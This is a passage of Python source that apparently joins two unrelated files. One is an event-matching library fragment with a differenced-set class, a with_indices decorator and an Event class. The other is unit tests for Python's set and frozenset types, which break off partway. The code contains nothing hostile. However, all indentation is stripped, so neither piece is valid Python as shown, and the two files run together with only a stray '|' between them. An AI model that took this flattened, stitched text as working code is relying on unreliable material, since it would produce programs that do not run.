Special "differenced" set. Items in 'base', 'add', 'remove' must not be same
Used by `wait_for_all`
"""
__slots__ = ('base', 'add', 'remove', 'result', 'length')
def __init__(self, base = (), add = (), remove = ()):
self.base = base
self.add = add
self.remove = remove
self.result = None
self.length = None
def __add__(self, matchers):
return DiffRef_(self, matchers)
def __iter__(self):
if self.result is None:
add = set()
remove = set()
base = self
while isinstance(base, Diff_):
if len(base) == len(base.add):
base = base.add
break
add.update(base.add)
remove.update(base.remove)
base = base.base
add.update(base)
add.difference_update(remove)
self.result = tuple(add)
return iter(self.result)
def __len__(self):
if self.length is None:
l = 0
base = self
while isinstance(base, Diff_):
l += len(base.add) - len(base.remove)
base = base.base
l += len(base)
self.length = l
return l
else:
return self.length
def two_way_difference(self, b, extra_add = (), extra_remove = ()):
"""
Return (self - b, b - self)
"""
if self is b:
return ((), ())
if isinstance(b, DiffRef_):
extra_remove = extra_remove + b.add
b = b.origin
if extra_add == extra_remove:
extra_add = extra_remove = ()
if isinstance(b, Diff_):
if self.base is b.base:
first = self.add + b.remove
second = self.remove + b.add
elif self.base is b:
first = self.add
second = self.remove
elif b.base is self:
first = b.remove
second = b.add
else:
first = self
second = b
else:
first = self
second = b
if not first and not extra_add:
return ((), tuple(second) + tuple(extra_remove))
elif not second and not extra_remove:
return (tuple(first) + tuple(extra_add), ())
else:
first = set(first)
first.update(extra_add)
second = set(second)
second.update(extra_remove)
return tuple(first.difference(second)), tuple(second.difference(first))
def __await__(self):
return (yield self)
def with_indices(*args):
'''
Create indices for an event class. Every event class must be decorated with this decorator.
'''
def decorator(cls):
for c in cls.__bases__:
if hasattr(c, '_indicesNames'):
cls._classnameIndex = c._classnameIndex + 1
for i in range(0, cls._classnameIndex):
setattr(cls, '_classname' + str(i), getattr(c, '_classname' + str(i)))
setattr(cls, '_classname' + str(cls._classnameIndex), cls._getTypename())
cls._indicesNames = c._indicesNames + ('_classname' + str(cls._classnameIndex),) + args
cls._generateTemplate()
return cls
cls._classnameIndex = -1
cls._indicesNames = args
cls._generateTemplate()
return cls
return decorator
withIndices = with_indices
class Event(object):
'''
A generated event with indices
'''
canignore = True
_indicesNames = ()
_classnameIndex = -1
def __init__(self, *args, **kwargs):
'''
:param args: index values like 12,"read",... content are type-depended.
:param kwargs:
*indices*
input indices by name
canignore
if the event is not processed, whether it is safe to ignore the event.
If it is not, the processing queue might be blocked to wait for a proper event processor.
Default to True.
*others*
the properties will be set on the created event
'''
if kwargs and not args:
indicesNames = self.indicesNames()
indices = tuple(kwargs[k] if k[:10] != '_classname' else getattr(self, k) for k in indicesNames)
else:
indices = tuple(self._generateIndices(args))
self.indices = indices
if kwargs:
self.__dict__.update(kwargs)
def __getattr__(self, key):
indicesNames = self.indicesNames()
def _cache(v):
setattr(self, key, v)
return v
try:
i = indicesNames.index(key)
except ValueError:
raise AttributeError(key)
else:
return _cache(self.indices[i])
@classmethod
def indicesNames(cls):
'''
:returns: names of indices
'''
return getattr(cls, '_indicesNames', ())
@classmethod
def _getTypename(cls):
module = cls.__module__
if module is None:
return cls.__name__
else:
return module + '.' + cls.__name__
@classmethod
def getTypename(cls):
'''
:returns: return the proper name to match
'''
if cls is Event:
return None
else:
for c in cls.__bases__:
if issubclass(c, Event):
if c is Event:
return cls._getTypename()
else:
return c.getTypename()
@classmethod
def _generateTemplate(cls):
names = cls.indicesNames()
template = [None] * len(names)
argpos = []
leastsize = 0
for i in range(0, len(names)):
if names[i][:10] == '_classname':
template[i] = getattr(cls, names[i])
leastsize = i + 1
else:
argpos.append(i)
cls._template = template
cls._argpos = argpos
cls._leastsize = leastsize
@classmethod
def _generateIndices(cls, args):
indices = cls._template[:]
ap = cls._argpos
lp = 0
if args:
for i in range(0, len(args)):
indices[ap[i]] = args[i]
lp = ap[len(args) - 1] + 1
return indices[:max(cls._leastsize, lp)]
@classmethod
def createMatcher(cls, *args, **kwargs):
'''
:param _ismatch: user-defined function ismatch(event) for matching test
:param \*args: indices
:param \*\*kwargs: index_name=index_value for matching criteria
'''
if kwargs and not args:
return EventMatcher(tuple(getattr(cls, ind) if ind[:10] == '_classname' else kwargs.get(ind) for ind in cls.indicesNames()), kwargs.get('_ismatch'))
else:
return EventMatcher(tuple(cls._generateIndices(args)), kwargs.get('_ismatch'))
def __repr__(self):
cls = type(self)
return '<' + cls.__module__ + '.' + cls.__name__ + '(' + self.getTypename() + '): {' + \
', '.join(repr(k) + ': ' + repr(v) for k,v in zip(self.indicesNames(), self.indices)) + '}>'
def canignorenow(self):
'''
Extra criteria for an event with canignore = False.
When this event returns True, the event is safely ignored.
'''
return False
|
|
import unittest
from test import support
from test.support import warnings_helper
import gc
import weakref
import operator
import copy
import pickle
from random import randrange, shuffle
import warnings
import collections
import collections.abc
import itertools
class PassThru(Exception):
pass
def check_pass_thru():
raise PassThru
yield 1
class BadCmp:
def __hash__(self):
return 1
def __eq__(self, other):
raise RuntimeError
class ReprWrapper:
'Used to test self-referential repr() calls'
def __repr__(self):
return repr(self.value)
class HashCountingInt(int):
'int-like object that counts the number of times __hash__ is called'
def __init__(self, *args):
self.hash_count = 0
def __hash__(self):
self.hash_count += 1
return int.__hash__(self)
class TestJointOps:
# Tests common to both set and frozenset
def setUp(self):
self.word = word = 'simsalabim'
self.otherword = 'madagascar'
self.letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
self.s = self.thetype(word)
self.d = dict.fromkeys(word)
def test_new_or_init(self):
self.assertRaises(TypeError, self.thetype, [], 2)
self.assertRaises(TypeError, set().__init__, a=1)
def test_uniquification(self):
actual = sorted(self.s)
expected = sorted(self.d)
self.assertEqual(actual, expected)
self.assertRaises(PassThru, self.thetype, check_pass_thru())
self.assertRaises(TypeError, self.thetype, [[]])
def test_len(self):
self.assertEqual(len(self.s), len(self.d))
def test_contains(self):
for c in self.letters:
self.assertEqual(c in self.s, c in self.d)
self.assertRaises(TypeError, self.s.__contains__, [[]])
s = self.thetype([frozenset(self.letters)])
self.assertIn(self.thetype(self.letters), s)
def test_union(self):
u = self.s.union(self.otherword)
for c in self.letters:
self.assertEqual(c in u, c in self.d or c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(u), self.basetype)
self.assertRaises(PassThru, self.s.union, check_pass_thru())
self.assertRaises(TypeError, self.s.union, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').union(C('cdc')), set('abcd'))
self.assertEqual(self.thetype('abcba').union(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').union(C('ccb')), set('abc'))
self.assertEqual(self.thetype('abcba').union(C('ef')), set('abcef'))
self.assertEqual(self.thetype('abcba').union(C('ef'), C('fg')), set('abcefg'))
# Issue #6573
x = self.thetype()
self.assertEqual(x.union(set([1]), x, set([2])), self.thetype([1, 2]))
def test_or(self):
i = self.s.union(self.otherword)
self.assertEqual(self.s | set(self.otherword), i)
self.assertEqual(self.s | frozenset(self.otherword), i)
try:
self.s | self.otherword
except TypeError:
pass
else:
self.fail("s|t did not screen-out general iterables")
def test_intersection(self):
i = self.s.intersection(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.intersection, check_pass_thru())
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').intersection(C('cdc')), set('cc'))
self.assertEqual(self.thetype('abcba').intersection(C('efgfe')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('ccb')), set('bc'))
self.assertEqual(self.thetype('abcba').intersection(C('ef')), set(''))
self.assertEqual(self.thetype('abcba').intersection(C('cbcf'), C('bag')), set('b'))
s = self.thetype('abcba')
z = s.intersection()
if self.thetype == frozenset():
self.assertEqual(id(s), id(z))
else:
self.assertNotEqual(id(s), id(z))
def test_isdisjoint(self):
def f(s1, s2):
'Pure python equivalent of isdisjoint()'
return not set(s1).intersection(s2)
for larg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
s1 = self.thetype(larg)
for rarg in '', 'a', 'ab', 'abc', 'ababac', 'cdc', 'cc', 'efgfe', 'ccb', 'ef':
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s2 = C(rarg)
actual = s1.isdisjoint(s2)
expected = f(s1, s2)
self.assertEqual(actual, expected)
self.assertTrue(actual is True or actual is False)
def test_and(self):
i = self.s.intersection(self.otherword)
self.assertEqual(self.s & set(self.otherword), i)
self.assertEqual(self.s & frozenset(self.otherword), i)
try:
self.s & self.otherword
except TypeError:
pass
else:
self.fail("s&t did not screen-out general iterables")
def test_difference(self):
i = self.s.difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, c in self.d and c not in self.otherword)
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.difference, check_pass_thru())
self.assertRaises(TypeError, self.s.difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').difference(C('cdc')), set('ab'))
self.assertEqual(self.thetype('abcba').difference(C('efgfe')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').difference(C('ef')), set('abc'))
self.assertEqual(self.thetype('abcba').difference(), set('abc'))
self.assertEqual(self.thetype('abcba').difference(C('a'), C('b')), set('c'))
def test_sub(self):
i = self.s.difference(self.otherword)
self.assertEqual(self.s - set(self.otherword), i)
self.assertEqual(self.s - frozenset(self.otherword), i)
try:
self.s - self.otherword
except TypeError:
pass
else:
self.fail("s-t did not screen-out general iterables")
def test_symmetric_difference(self):
i = self.s.symmetric_difference(self.otherword)
for c in self.letters:
self.assertEqual(c in i, (c in self.d) ^ (c in self.otherword))
self.assertEqual(self.s, self.thetype(self.word))
self.assertEqual(type(i), self.basetype)
self.assertRaises(PassThru, self.s.symmetric_difference, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference, [[]])
for C in set, frozenset, dict.fromkeys, str, list, tuple:
self.assertEqual(self.thetype('abcba').symmetric_difference(C('cdc')), set('abd'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('efgfe')), set('abcefg'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ccb')), set('a'))
self.assertEqual(self.thetype('abcba').symmetric_difference(C('ef')), set('abcef'))
def test_xor(self):
i = self.s.symmetric_difference(self.otherword)
self.assertEqual(self.s ^ set(self.otherword), i)
self.assertEqual(self.s ^ frozenset(self.otherword), i)
try:
self.s ^ self.otherword
except TypeError:
pass
else:
self.fail("s^t did not screen-out general iterables")
def test_equality(self):
self.assertEqual(self.s, set(self.word))
self.assertEqual(self.s, frozenset(self.word))
self.assertEqual(self.s == self.word, False)
self.assertNotEqual(self.s, set(self.otherword))
self.assertNotEqual(self.s, frozenset(self.otherword))
self.assertEqual(self.s != self.word, True)
def test_setOfFrozensets(self):
t = map(frozenset, ['abcdef', 'bcd', 'bdcb', 'fed', 'fedccba'])
s = self.thetype(t)
self.assertEqual(len(s), 3)
def test_sub_and_super(self):
p, q, r = map(self.thetype, ['ab', 'abcde', 'def'])
self.assertTrue(p < q)
self.assertTrue(p <= q)
self.assertTrue(q <= q)
self.assertTrue(q > p)
self.assertTrue(q >= p)
self.assertFalse(q < r)
self.assertFalse(q <= r)
self.assertFalse(q > r)
self.assertFalse(q >= r)
self.assertTrue(set('a').issubset('abc'))
self.assertTrue(set('abc').issuperset('a'))
self.assertFalse(set('a').issubset('cbs'))
self.assertFalse(set('cbs').issuperset('a'))
def test_pickling(self):
for i in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s, dup, "%s != %s" % (self.s, dup))
if type(self.s) not in (set, frozenset):
self.s.x = 10
p = pickle.dumps(self.s, i)
dup = pickle.loads(p)
self.assertEqual(self.s.x, dup.x)
def test_iterator_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
itorg = iter(self.s)
data = self.thetype(self.s)
d = pickle.dumps(itorg, proto)
it = pickle.loads(d)
# Set iterators unpickle as list iterators due to the
# undefined order of set items.
# self.assertEqual(type(itorg), type(it))
self.assertIsInstance(it, collections.abc.Iterator)
self.assertEqual(self.thetype(it), data)
it = pickle.loads(d)
try:
drop = next(it)
except StopIteration:
continue
d = pickle.dumps(it, proto)
it = pickle.loads(d)
self.assertEqual(self.thetype(it), data - self.thetype((drop,)))
def test_deepcopy(self):
class Tracer:
def __init__(self, value):
self.value = value
def __hash__(self):
return self.value
def __deepcopy__(self, memo=None):
return Tracer(self.value + 1)
t = Tracer(10)
s = self.thetype([t])
dup = copy.deepcopy(s)
self.assertNotEqual(id(s), id(dup))
for elem in dup:
newt = elem
self.assertNotEqual(id(t), id(newt))
self.assertEqual(t.value + 1, newt.value)
def test_gc(self):
# Create a nest of cycles to exercise overall ref count check
class A:
pass
s = set(A() for i in range(1000))
for elem in s:
elem.cycle = s
elem.sub = elem
elem.set = set([elem])
def test_subclass_with_custom_hash(self):
# Bug #1257731
class H(self.thetype):
def __hash__(self):
return int(id(self) & 0x7fffffff)
s=H()
f=set()
f.add(s)
self.assertIn(s, f)
f.remove(s)
f.add(s)
f.discard(s)
def test_badcmp(self):
s = self.thetype([BadCmp()])
# Detect comparison errors during insertion and lookup
self.assertRaises(RuntimeError, self.thetype, [BadCmp(), BadCmp()])
self.assertRaises(RuntimeError, s.__contains__, BadCmp())
# Detect errors during mutating operations
if hasattr(s, 'add'):
self.assertRaises(RuntimeError, s.add, BadCmp())
self.assertRaises(RuntimeError, s.discard, BadCmp())
self.assertRaises(RuntimeError, s.remove, BadCmp())
def test_cyclical_repr(self):
w = ReprWrapper()
s = self.thetype([w])
w.value = s
if self.thetype == set:
self.assertEqual(repr(s), '{set(...)}')
else:
name = repr(s).partition('(')[0] # strip class name
self.assertEqual(repr(s), '%s({%s(...)})' % (name, name))
def test_do_not_rehash_dict_keys(self):
n = 10
d = dict.fromkeys(map(HashCountingInt, range(n)))
self.assertEqual(sum(elem.hash_count for elem in d), n)
s = self.thetype(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
s.difference(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
if hasattr(s, 'symmetric_difference_update'):
s.symmetric_difference_update(d)
self.assertEqual(sum(elem.hash_count for elem in d), n)
d2 = dict.fromkeys(set(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d))
self.assertEqual(sum(elem.hash_count for elem in d), n)
d3 = dict.fromkeys(frozenset(d), 123)
self.assertEqual(sum(elem.hash_count for elem in d), n)
self.assertEqual(d3, dict.fromkeys(d, 123))
def test_container_iterator(self):
# Bug #3680: tp_traverse was not implemented for set iterator object
class C(object):
pass
obj = C()
ref = weakref.ref(obj)
container = set([obj, 1])
obj.x = iter(container)
del obj, container
gc.collect()
self.assertTrue(ref() is None, "Cycle was not collected")
def test_free_after_iterating(self):
support.check_free_after_iterating(self, iter, self.thetype)
class TestSet(TestJointOps, unittest.TestCase):
thetype = set
basetype = set
def test_init(self):
s = self.thetype()
s.__init__(self.word)
self.assertEqual(s, set(self.word))
s.__init__(self.otherword)
self.assertEqual(s, set(self.otherword))
self.assertRaises(TypeError, s.__init__, s, 2)
self.assertRaises(TypeError, s.__init__, 1)
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_set_literal(self):
s = set([1,2,3])
t = {1,2,3}
self.assertEqual(s, t)
def test_set_literal_insertion_order(self):
# SF Issue #26020 -- Expect left to right insertion
s = {1, 1.0, True}
self.assertEqual(len(s), 1)
stored_value = s.pop()
self.assertEqual(type(stored_value), int)
def test_set_literal_evaluation_order(self):
# Expect left to right expression evaluation
events = []
def record(obj):
events.append(obj)
s = {record(1), record(2), record(3)}
self.assertEqual(events, [1, 2, 3])
def test_hash(self):
self.assertRaises(TypeError, hash, self.s)
def test_clear(self):
self.s.clear()
self.assertEqual(self.s, set())
self.assertEqual(len(self.s), 0)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(self.s, dup)
self.assertNotEqual(id(self.s), id(dup))
self.assertEqual(type(dup), self.basetype)
def test_add(self):
self.s.add('Q')
self.assertIn('Q', self.s)
dup = self.s.copy()
self.s.add('Q')
self.assertEqual(self.s, dup)
self.assertRaises(TypeError, self.s.add, [])
def test_remove(self):
self.s.remove('a')
self.assertNotIn('a', self.s)
self.assertRaises(KeyError, self.s.remove, 'Q')
self.assertRaises(TypeError, self.s.remove, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.remove(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
self.assertRaises(KeyError, self.s.remove, self.thetype(self.word))
def test_remove_keyerror_unpacking(self):
# bug: www.python.org/sf/1576657
for v1 in ['Q', (1,)]:
try:
self.s.remove(v1)
except KeyError as e:
v2 = e.args[0]
self.assertEqual(v1, v2)
else:
self.fail()
def test_remove_keyerror_set(self):
key = self.thetype([3, 4])
try:
self.s.remove(key)
except KeyError as e:
self.assertTrue(e.args[0] is key,
"KeyError should be {0}, not {1}".format(key,
e.args[0]))
else:
self.fail()
def test_discard(self):
self.s.discard('a')
self.assertNotIn('a', self.s)
self.s.discard('Q')
self.assertRaises(TypeError, self.s.discard, [])
s = self.thetype([frozenset(self.word)])
self.assertIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
self.assertNotIn(self.thetype(self.word), s)
s.discard(self.thetype(self.word))
def test_pop(self):
for i in range(len(self.s)):
elem = self.s.pop()
self.assertNotIn(elem, self.s)
self.assertRaises(KeyError, self.s.pop)
def test_update(self):
retval = self.s.update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
self.assertRaises(PassThru, self.s.update, check_pass_thru())
self.assertRaises(TypeError, self.s.update, [[]])
for p, q in (('cdc', 'abcd'), ('efgfe', 'abcefg'), ('ccb', 'abc'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p)), None)
self.assertEqual(s, set(q))
for p in ('cdc', 'efgfe', 'ccb', 'ef', 'abcda'):
q = 'ahi'
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.update(C(p), C(q)), None)
self.assertEqual(s, set(s) | set(p) | set(q))
def test_ior(self):
self.s |= set(self.otherword)
for c in (self.word + self.otherword):
self.assertIn(c, self.s)
def test_intersection_update(self):
retval = self.s.intersection_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.intersection_update, check_pass_thru())
self.assertRaises(TypeError, self.s.intersection_update, [[]])
for p, q in (('cdc', 'c'), ('efgfe', ''), ('ccb', 'bc'), ('ef', '')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.intersection_update(C(p)), None)
self.assertEqual(s, set(q))
ss = 'abcba'
s = self.thetype(ss)
t = 'cbc'
self.assertEqual(s.intersection_update(C(p), C(t)), None)
self.assertEqual(s, set('abcba')&set(p)&set(t))
def test_iand(self):
self.s &= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.otherword and c in self.word:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_difference_update(self):
retval = self.s.difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.difference_update, [[]])
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'ab'), ('efgfe', 'abc'), ('ccb', 'a'), ('ef', 'abc')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.difference_update(C(p)), None)
self.assertEqual(s, set(q))
s = self.thetype('abcdefghih')
s.difference_update()
self.assertEqual(s, self.thetype('abcdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('aba'))
self.assertEqual(s, self.thetype('cdefghih'))
s = self.thetype('abcdefghih')
s.difference_update(C('cdc'), C('aba'))
self.assertEqual(s, self.thetype('efghih'))
def test_isub(self):
self.s -= set(self.otherword)
for c in (self.word + self.otherword):
if c in self.word and c not in self.otherword:
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_symmetric_difference_update(self):
retval = self.s.symmetric_difference_update(self.otherword)
self.assertEqual(retval, None)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
self.assertRaises(PassThru, self.s.symmetric_difference_update, check_pass_thru())
self.assertRaises(TypeError, self.s.symmetric_difference_update, [[]])
for p, q in (('cdc', 'abd'), ('efgfe', 'abcefg'), ('ccb', 'a'), ('ef', 'abcef')):
for C in set, frozenset, dict.fromkeys, str, list, tuple:
s = self.thetype('abcba')
self.assertEqual(s.symmetric_difference_update(C(p)), None)
self.assertEqual(s, set(q))
def test_ixor(self):
self.s ^= set(self.otherword)
for c in (self.word + self.otherword):
if (c in self.word) ^ (c in self.otherword):
self.assertIn(c, self.s)
else:
self.assertNotIn(c, self.s)
def test_inplace_on_self(self):
t = self.s.copy()
t |= t
self.assertEqual(t, self.s)
t &= t
self.assertEqual(t, self.s)
t -= t
self.assertEqual(t, self.thetype())
t = self.s.copy()
t ^= t
self.assertEqual(t, self.thetype())
def test_weakref(self):
s = self.thetype('gallahad')
p = weakref.proxy(s)
self.assertEqual(str(p), str(s))
s = None
self.assertRaises(ReferenceError, str, p)
def test_rich_compare(self):
class TestRichSetCompare:
def __gt__(self, some_set):
self.gt_called = True
return False
def __lt__(self, some_set):
self.lt_called = True
return False
def __ge__(self, some_set):
self.ge_called = True
return False
def __le__(self, some_set):
self.le_called = True
return False
# This first tries the builtin rich set comparison, which doesn't know
# how to handle the custom object. Upon returning NotImplemented, the
# corresponding comparison on the right object is invoked.
myset = {1, 2, 3}
myobj = TestRichSetCompare()
myset < myobj
self.assertTrue(myobj.gt_called)
myobj = TestRichSetCompare()
myset > myobj
self.assertTrue(myobj.lt_called)
myobj = TestRichSetCompare()
myset <= myobj
self.assertTrue(myobj.ge_called)
myobj = TestRichSetCompare()
myset >= myobj
self.assertTrue(myobj.le_called)
@unittest.skipUnless(hasattr(set, "test_c_api"),
'C API test only available in a debug build')
def test_c_api(self):
self.assertEqual(set().test_c_api(), True)
class SetSubclass(set):
pass
class TestSetSubclass(TestSet):
thetype = SetSubclass
basetype = set
class SetSubclassWithKeywordArgs(set):
def __init__(self, iterable=[], newarg=None):
set.__init__(self, iterable)
class TestSetSubclassWithKeywordArgs(TestSet):
def test_keywords_in_subclass(self):
'SF bug #1486663 -- this used to erroneously raise a TypeError'
SetSubclassWithKeywordArgs(newarg=1)
class TestFrozenSet(TestJointOps, unittest.TestCase):
thetype = frozenset
basetype = frozenset
def test_init(self):
s = self.thetype(self.word)
s.__init__(self.otherword)
self.assertEqual(s, set(self.word))
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertEqual(id(s), id(t))
def test_hash(self):
self.assertEqual(hash(self.thetype('abcdeb')),
hash(self.thetype('ebecda')))
# make sure that all permutations give the same hash value
n = 100
seq = [randrange(n) for i in range(n)]
results = set()
for i in range(200):
shuffle(seq)
results.add(hash(self.thetype(seq)))
self.assertEqual(len(results), 1)
def test_copy(self):
dup = self.s.copy()
self.assertEqual(id(self.s), id(dup))
def test_frozen_as_dictkey(self):
seq = list(range(10)) + list('abcdefg') + ['apple']
key1 = self.thetype(seq)
key2 = self.thetype(reversed(seq))
self.assertEqual(key1, key2)
self.assertNotEqual(id(key1), id(key2))
d = {}
d[key1] = 42
self.assertEqual(d[key2], 42)
def test_hash_caching(self):
f = self.thetype('abcdcda')
self.assertEqual(hash(f), hash(f))
def test_hash_effectiveness(self):
n = 13
hashvalues = set()
addhashvalue = hashvalues.add
elemmasks = [(i+1, 1<<i) for i in range(n)]
for i in range(2**n):
addhashvalue(hash(frozenset([e for e, m in elemmasks if m&i])))
self.assertEqual(len(hashvalues), 2**n)
def zf_range(n):
# https://en.wikipedia.org/wiki/Set-theoretic_definition_of_natural_numbers
nums = [frozenset()]
for i in range(n-1):
num = frozenset(nums)
nums.append(num)
return nums[:n]
def powerset(s):
for i in range(len(s)+1):
yield from map(frozenset, itertools.combinations(s, i))
for n in range(18):
t = 2 ** n
mask = t - 1
for nums in (range, zf_range):
u = len({h & mask for h in map(hash, powerset(nums(n)))})
self.assertGreater(4*u, t)
class FrozenSetSubclass(frozenset):
pass
class TestFrozenSetSubclass(TestFrozenSet):
thetype = FrozenSetSubclass
basetype = frozenset
def test_constructor_identity(self):
s = self.thetype(range(3))
t = self.thetype(s)
self.assertNotEqual(id(s), id(t))
def test_copy(self):
dup = self.s.copy()
self.assertNotEqual(id(self.s), id(dup))
def test_nested_empty_constructor(self):
s = self.thetype()
t = self.thetype(s)
self.assertEqual(s, t)
def test_singleton_empty_frozenset(self):
Frozenset = self.thetype
f = frozenset()
F = Frozenset()
efs = [Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(), Frozenset([]), Frozenset(()), Frozenset(''),
Frozenset(range(0)), Frozenset(Frozenset()),
Frozenset(frozenset()), f, F, Frozenset(f), Frozenset(F)]
# All empty frozenset subclass instances should have different ids
self.assertEqual(len(set(map(id, efs))), len(efs))
# Tests taken from test_sets.py =============================================
empty_set = set()
#==============================================================================
class TestBasicOps:
def test_repr(self):
if self.repr is not None:
self.assertEqual(repr(self.set), self.repr)
def check_repr_against_values(self):
text = repr(self.set)
self.assertTrue(text.startswith('{'))
self.assertTrue(text.endswith('}'))
result = text[1:-1].split(', ')
result.sort()
sorted_repr_values = [repr(value) for value in self.values]
sorted_repr_values.sort()
self.assertEqual(result, sorted_repr_values)
def test_length(self):
self.assertEqual(len(self.set), self.length)
def test_self_equality(self):
self.assertEqual(self.set, self.set)
def test_equivalent_equality(self):
self.assertEqual(self.set, self.dup)
def test_copy(self):
self.assertEqual(self.set.copy(), self.dup)
def test_self_union(self):
result = self.set | self.set
self.assertEqual(result, self.dup)
def test_empty_union(self):
result = self.set | empty_set
self.assertEqual(result, self.dup)
def test_union_empty(self):
result = empty_set | self.set
self.assertEqual(result, self.dup)
def test_self_intersection(self):
result = self.set & self.set
self.assertEqual(result, self.dup)
def test_empty_intersection(self):
result = self.set & empty_set
self.assertEqual(result, empty_set)
def test_intersection_empty(self):
result = empty_set & self.set
self.assertEqual(result, empty_set)
def test_self_isdisjoint(self):
result = self.set.isdisjoint(self.set)
self.assertEqual(result, not self.set)
def test_empty_isdisjoint(self):
result = self.set.isdisjoint(empty_set)
self.assertEqual(result, True)
def test_isdisjoint_empty(self):
result = empty_set.isdisjoint(self.set)
self.assertEqual(result, True)
def test_self_symmetric_difference(self):
result = self.set ^ self.set
self.assertEqual(result, empty_set)
def test_empty_symmetric_difference(self):
result = self.set ^ empty_set
self.assertEqual(result, self.set)
def test_self_difference(self):
result = self.set - self.set
self.assertEqual(result, empty_set)
def test_empty_difference(self):
result = self.set - empty_set
self.assertEqual(result, self.dup)
def test_empty_difference_rev(self):
result = empty_set - self.set
self.assertEqual(result, empty_set)
def test_iteration(self):
for v in self.set:
self.assertIn(v, self.values)
setiter = iter(self.set)
self.assertEqual(setiter.__length_hint__(), len(self.set))
def test_pickling(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
p = pickle.dumps(self.set, proto)
copy = pickle.loads(p)
self.assertEqual(self.set, copy,
"%s != %s" % (self.set, copy))
def test_issue_37219(self):
with self.assertRaises(TypeError):
set().difference(123)
with self.assertRaises(TypeError):
set().difference_update(123)
#------------------------------------------------------------------------------
class TestBasicOpsEmpty(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "empty set"
self.values = []
self.set = set(self.values)
self.dup = set(self.values)
self.length = 0
self.repr = "set()"
#------------------------------------------------------------------------------
class TestBasicOpsSingleton(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (number)"
self.values = [3]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{3}"
def test_in(self):
self.assertIn(3, self.set)
def test_not_in(self):
self.assertNotIn(2, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTuple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "unit set (tuple)"
self.values = [(0, "zero")]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 1
self.repr = "{(0, 'zero')}"
def test_in(self):
self.assertIn((0, "zero"), self.set)
def test_not_in(self):
self.assertNotIn(9, self.set)
#------------------------------------------------------------------------------
class TestBasicOpsTriple(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "triple set"
self.values = [0, "zero", operator.add]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
self.repr = None
#------------------------------------------------------------------------------
class TestBasicOpsString(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "string set"
self.values = ["a", "b", "c"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self.case = "bytes set"
self.values = [b"a", b"b", b"c"]
self.set = set(self.values)
